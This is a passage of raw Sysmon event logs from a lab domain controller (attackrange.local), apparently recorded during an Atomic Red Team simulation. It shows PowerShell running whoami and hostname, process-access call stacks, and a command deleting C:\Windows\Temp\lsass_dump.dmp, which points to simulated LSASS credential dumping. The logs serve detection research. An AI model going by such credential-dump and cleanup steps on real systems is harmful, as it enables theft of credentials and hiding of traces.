19_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135d2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135a82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b43b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64) 154100x8000000000000000180154Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.641{29E67E80-D475-601A-4630-00000000A301}3432C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000180153Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.619{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D475-601A-4530-00000000A301}6792C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180152Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.619{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180151Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.619{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180150Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.619{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180149Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.619{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180148Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.619{29E67E80-84F4-6019-2C05-00000000A301}19281400C:\Windows\system32\csrss.exe{29E67E80-D475-601A-4530-00000000A301}6792C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180147Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.619{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D475-601A-4530-00000000A301}6792C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+141132a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135d2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135a82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b43b3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b4133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64) 154100x8000000000000000180146Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:01.623{29E67E80-D475-601A-4530-00000000A301}6792C:\Windows\System32\HOSTNAME.EXE10.0.14393.0 (rs1_release.160715-1616)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x8000000000000000180222Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.197{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D47C-601A-4C30-00000000A301}6160C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180221Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.197{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D47C-601A-4C30-00000000A301}6160C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FFACE881C43) 10341000x8000000000000000180220Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.197{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180219Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.197{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180218Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.197{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180217Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.197{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180216Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.197{29E67E80-84F4-6019-2C05-00000000A301}19284632C:\Windows\system32\csrss.exe{29E67E80-D47C-601A-4C30-00000000A301}6160C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000180215Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.197{29E67E80-859E-6019-7005-00000000A301}41846780C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{29E67E80-D47C-601A-4C30-00000000A301}6160C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b3746(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b35ba(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+13635de6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135ac1a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+14065395(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+1357499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135d2e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b64ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135b635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135a82e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+135e1474(wow64) 154100x8000000000000000180214Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.195{29E67E80-D47C-601A-4C30-00000000A301}6160C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "del "C:\Windows\Temp\lsass_dump.dmp" >nul 2> nul" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{29E67E80-84F5-6019-88B2-2E0000000000}0x2eb2882HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x8000000000000000180213Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.181{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-02-03 16:51:01.760 11241100x8000000000000000180212Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.181{29E67E80-859E-6019-7005-00000000A301}4184C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-02-03 16:51:01.760 10341000x8000000000000000180211Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.056{29E67E80-859E-6019-7105-00000000A301}53601944C:\Windows\system32\conhost.exe{29E67E80-D47C-601A-4B30-00000000A301}6808C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180210Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.056{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000180209Microsoft-Windows-Sysmon/Operationalwin-dc-262.attackrange.local-2021-02-03 16:51:08.056{29E67E80-7CBF-6019-0C00-00000000A301}5884144C:\Windows\system32\svchost.exe{29E67E80-7CCF-6019-2F00-00000000A301}2868C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\